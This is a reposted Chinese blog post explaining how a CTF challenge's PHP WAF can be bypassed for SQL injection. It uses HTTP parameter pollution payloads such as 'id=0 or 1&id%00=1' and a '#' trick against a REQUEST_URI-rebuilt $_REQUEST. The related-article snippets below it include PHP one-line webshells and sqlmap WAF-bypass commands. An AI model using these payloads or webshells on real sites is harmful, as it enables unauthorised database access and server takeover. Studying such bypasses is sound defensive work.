【转】PHP的两个特性导致waf绕过注入

最新推荐文章于 2022-04-23 00:53:59 发布
最新推荐文章于 2022-04-23 00:53:59 发布
阅读量132 收藏
点赞数
分类专栏: PHP 文章标签: waf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/q0126a/article/details/84814612
版权

1、HPP HTTP参数污染

HTTP参数污染指的是,在URL中提交相同键值的两个参数时,服务器端一般会进行一些处理。比如Apache就要以最后一个参数为准,比如:

user.php?id=111&id=222

如果输出$_GET数组,则id的值只会取222,即URL上提交的多余值覆盖了前一个值。

2、一个CTF题目

http://drops.wooyun.org/tips/17248

关于注入的waf绕过,注入点为:

$sql="select * from user where id=".$_REQUEST["id"].";

可以看到了REQUEST进行传递,并且存在如下的waf代码:

functionwaf($str) {  
        if(stripos($str,"select")!==false)  
            die("Be a good person!");  
        if(stripos($str,"union")!==false)  
            die("Be a good person!");  
        ......  
    }    
      
    functionwafArr($arr) {  
        foreach($arras$k=> $v) {  
            waf($k);  
            waf($v);  
        }  
    }    
      
    wafArr($_GET);  
    wafArr($_POST);  
    wafArr($_COOKIE);  
    wafArr($_SESSION);  
      
    functionstripStr($str) {  
        if(get_magic_quotes_gpc())  
            $str= stripslashes($str);  
        returnaddslashes(htmlspecialchars($str, ENT_QUOTES, 'UTF-8'));  
    }    
      
    $uri= explode("?",$_SERVER['REQUEST_URI']);  
    if(isset($uri[1])) {  
        $parameter= explode("&",$uri[1]);  
        foreach($parameteras$k=> $v) {  
            $v1= explode("=",$v);  
            if(isset($v1[1])) {  
                $_REQUEST[$v1[0]] = stripStr($v1[1]);  
            }  
        }  
    }    
      
    functionstripArr($arr) {  
        $new_arr= array();  
        foreach($arras$k=> $v) {  
            $new_arr[stripStr($k)] = stripStr($v);  
        }  
        return$new_arr;  
    }    
      
    $_GET=stripArr($_GET);  
    $_POST=stripArr($_POST);  
    $_COOKIE=stripArr($_COOKIE);  
    $_SESSION=stripArr($_SESSION);

    这里使用了waf函数分别对GET POST SESSION COOKIE数据进行过滤,并且对这些全局数组进行转义。

 

值得注意的是,这里的$_REQUEST是代码中重新根据$_SERVER[‘REQUEST_URI’]进行拼接,在拼接过程中将参数值进行转义操作。

(1)思路1  使用HPP特性

看似不太可能存在注入,但是使用HPP可以实现。

示例代码:

user.php?id=0 or 1&id%00=1  
user.php?id=0 or 1&%20id=1  
user.php?id=0 or 1?&id=1
    测试代码: 
<?php  
      
    function stripArr($arr) {  
        $new_arr = array();  
        foreach ($arr as $k => $v) {  
            $new_arr[stripStr($k)] = stripStr($v);  
        }  
        return $new_arr;  
    }  
      
    function stripStr($str) {  
        if (get_magic_quotes_gpc())  
            $str = stripslashes($str);  
        return addslashes(htmlspecialchars($str, ENT_QUOTES, 'UTF-8'));  
    }  
      
    $uri = explode("?",$_SERVER['REQUEST_URI']);  
    if(isset($uri[1])) {  
        $parameter = explode("&",$uri[1]);  
        foreach ($parameter as $k => $v) {  
            $v1 = explode("=",$v);  
            if (isset($v1[1])) {  
                $_REQUEST[$v1[0]] = stripStr($v1[1]);  
            }  
        }  
    }  
    var_dump($_GET) ;  
      
    var_dump($_REQUEST) ;  
      
    ?>

输出结果:

可以看到,这里的GET数组取到了最后一个值,不会触发waf,而REQUEST数据中,id则为我们的注入语句,这样

利用这两者之间的差异,我们可以绕过waf函数的检测,并且利用之前的注入点来实现注入。

(2)思路2: 利用#特性($_SERVER[‘REQUEST_URI’])

在浏览器中,是不会将#号之后的hash内容发送给服务器的,这里利用burp发包,可以将hash的内容发送至服务器,比如发送:

/#?id=1

这里GET数组为空,REQUEST则输出为/#?id=1,这样,就可以绕过waf函数对GET数组的判断,

并且在REQUEST(这里主要因为REQUEST数组是使用了REQUEST_URI进行了重组)中携带注入的语句,绕过了waf检测。


 

3、总结

这种特性导致的漏洞场景比较特殊,首先,CTF中模拟的场景是waf函数 只对GET,POST,SESSION,COOKIES全局数组进行的处理,注入点为REQUEST,在场景中,代码对REQUEST数组通 过$_SERVER[‘REQUEST_URI’],使用&分割重新组装的,这种代码处理可能是由于程序员想对REQUEST数组进行转义或者一 些净化处理才加进来的。

利用:

(1)HPP特性,提交重复参数内容,PHP处理参数时会覆盖,但是程序拼接时会出现差异,

比如提交:http://127.0.0.1/shell.php?id=0 or 1&id%00=1

GET为id=1,REQUEST为:

'id' =><small>string</small>'0%20or%201'(length=10)
  'id%00' =><small>string</small>'1'(length=1)
  可以看到,成功将注入内容引入到REQUEST数组中。

(2)利用#符号,#后面的内容不会带入至GET数组中,但是会出现在REQUEST_URI中,所以可以利用这个特性将注入语句带入到REQUEST对象中。

总之,这种特性导致的漏洞场景比较特殊,但是确实比较有趣。

q0126a
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php-waf合集
12-24
压缩包内包含php版本的waf,支持过滤非法字符及文件等功能
PHP两个特性导致waf绕过注入(有趣的知识点)
Exploit的小站~
07-04 8017
1、HPP HTTP参数污染 HTTP参数污染指的是,在URL中提交相同键值的两个参数时,服务器端一般会进行一些处理。比如Apache就要以最后一个参数为准,比如: user.php?id=111&id=222 如果输出$_GET数组,则id的值只会取222,即URL上提交的多余值覆盖了前一个值。 2、一个CTF题目 http://drops.wooyun.org/tips/
利用PHP的字符串解析特性绕过Waf
qq_45521281的博客
05-01 3581
PHP的字符串解析特性 我们知道PHP将查询字符串(在URL或正文中)换为内部关联数组$_GET或关联数组$_POST。例如:/?foo=bar变成Array([foo] => “bar”)。值得注意的是,查询字符串在解析的过程中会将某些字符删除或用下划线代替。例如,/?%20news[id%00=42会换为Array([news_id] => 42)。如果一个IDS/IPS或WA...
phpwaf,简单绕过waf拿下bc网站
weixin_30709179的博客
03-11 471
确定目标收集信息x.x.x.x首先常规测试方法一顿怼,目录扫描,端口扫描,js文件,中间件,指纹识别,反正该上的都上。。。。随手加个路径,报错了,当看到这个界面我瞬间就有思路了为什么这么说呢,因为之前我就碰见过这样的网站报错, 这是一个php集成环境,叫upupw,跟phpstudy是一样的upupw --> pmd phpstudy --> phpmyadmin突破点这个集成环境包也...
phpwaf,【技术分享】php webshell分析和绕过waf技巧
weixin_42138703的博客
03-11 603
作者:阻圣预估稿费:400RMB(不服你也来投稿啊!)投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿前言WebShell是攻击者使用的恶意脚本,它的用途主要是在攻击后的Web应用程序上建立持久性的后门。webshell本身不能攻击或者利用远程漏洞,所以说它总是攻击的第二阶段,这个阶段我们经常称为post-exploitation。(PS:Post Exploitation是国...
SQL注入中的WAF绕过技术
08-19
SQL注入中的WAF绕过技术,里面的思路很好,可以学习一下
WAF绕过的各种方法总结.pdf
07-09
WAF绕过的各种方法总结总结语2019年7月9日,仅供学习参考,请勿用于非法用途
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
WAF绕过神器
12-14
顾名思义,铁鹰所创建的一款WAF绕过神器1.0版本。。。
waf是如何被绕过
12-30
介绍了白名单绕过、IP段白名单绕过绕过代理直接请求源站(代理模式云WAF)等绕过方式。适合初学者进行学习,不适合高手。
php WAF线下攻防用,模块化设计,功能可调,支持SQL AST分析
11-16
手工引用: 将Aegis.php与Aegis_lib.php放在同一目录,然后在防御目标的php文件头部加入<?php $AegisPHPName=__FILE__;include "/tmp/Aegis.php" ;?> 自动安装: 在本地的可以采用AegisManager进行本地安装或卸载,在服务端的用AegisInstaller.php与AegisUninst.php进行安装与卸载。 在防御成功显示图文的模式下,pic.jpg和music.mp3也需要与Aegis.php放在同一目录。 更多引用方式与配置方法请看注释。
Php学习之两个特性导致waf绕过注入详解
qq_32506555的博客
08-23 349
本文和大家分享的主要是php两个特性导致waf绕过注入相关内容,一起来看看吧,希望对大家学习php有所帮助。   1、HPP HTTP参数污染   HTTP参数污染指的是,在URL中提交相同键值的两个参数时,服务器端一般会进行一些处理。比如Apache就要以最后一个参数为准,比如:   user.php?id=111&id=222   如果输出$_GET数组,则id的值只
PHP一句话木马及绕waf思路
weixin_42299610的博客
03-23 2037
PHP一句话木马: 1 .eval(): <?php @eval($_POST['-7']); ?> eval函数将接受的字符串当做代码执行。 2.assert(): <?php @assert ($_POST['-7']); ?> assert函数将接受的字符串当做代码执行 。 3.preg_replace(): <?php @preg_replace("/...
php扩展 waf,基于PHP扩展的WAF实现
weixin_39622655的博客
03-18 195
访问一下看看结果:可以看到ls命令成功的执行了,也就是说我们的正常文件是不会被拦截的,而只有upload目录中的文件会被拦截,这样做又会引发另一个弊端,倘若攻击者通过某种方法将shell写入正常的文件中,或是与业务结合起来,那么这种防御手段就很难生效了。具体如何防御还要结合其他的特征进行检测,并不是没有办法了,实际应用中不能只依靠检测文件路径这一条规则,需要结合业务进行部署防御方案。另一种方法与这...
基于PHP扩展的WAF实现
swordheart的博客
04-23 2100
0x00 前言 最近上(ri)网(zhan)上(ri)多了,各种狗啊盾啊看的好心烦,好多蜜汁shell都被杀了,搞的我自己也想开发这么一个斩马刀,顺便当作毕设来做了。 未知攻,焉知防。我们先来看看shell们都是怎么躲过查杀的:加密、变形、回调、隐藏关键字……总之就是一句话,让自己变得没有特征,这样就可以躲过狗和盾的查杀。但是万变不离其宗,无论怎么变形,最终都会回到类似这样的格式: 1 2 3 <code>#!php $_GET($_P
网络攻防比赛PHP版本WAF
weixin_30932215的博客
04-14 1021
次去打HCTF决赛,用了这个自己写的WAF,web基本上没被打,被打的漏洞是文件包含漏洞,这个功能在本人这个waf里确实很是捉急,由于只是简单检测了..和php[35]{0,1},导致比赛由于文件包含漏洞web上失分了一次。不过现在不是很想去改进了。这个是比赛专用waf,商业价值几乎为0。 如果是框架写出的web就很好部署了,直接require在重写文件或者数据库文件中,如果是零散的p...
GET传值,waf过滤,php处理的整个流程
qq_62708558的博客
03-13 529
php再对变量进行解析,自动去掉空格,这时候就跳过了waf对num的监控而使得num变量get成了我们想要的值
PHP浮点数精度损失问题
四维空间
10-28 2179
      首先抛出一个问题,如下类似: &lt;?php $a = 0.57; echo intval(floatval($a) * 100); //56     结果可能有点出乎你的意外,PHP遵循IEEE 754双精度:     浮点数, 以64位的双精度, 采用1位符号位(E), 11指数位(Q), 52位尾数(M)表示(一共64位)     符号位:最高位表示数据的...
PHP判断内网/外网IP
四维空间
11-08 1117
        工作中用到PHP来判断内外网IP,查找资料偶然发现已有现成的实现函数,cool! filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)       函数还可以验证url、email等等。 ...
sqlmap绕过waf注入
最新发布
05-21
下面是一些绕过WAF的SQLMap注入技巧: 1. 修改HTTP头部 在SQLMap中使用`--headers`选项来修改HTTP头部,例如: ``` sqlmap -u "http://example.com?id=1" --headers="User-Agent: Mozilla/5.0 (Windows NT 10.0; ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值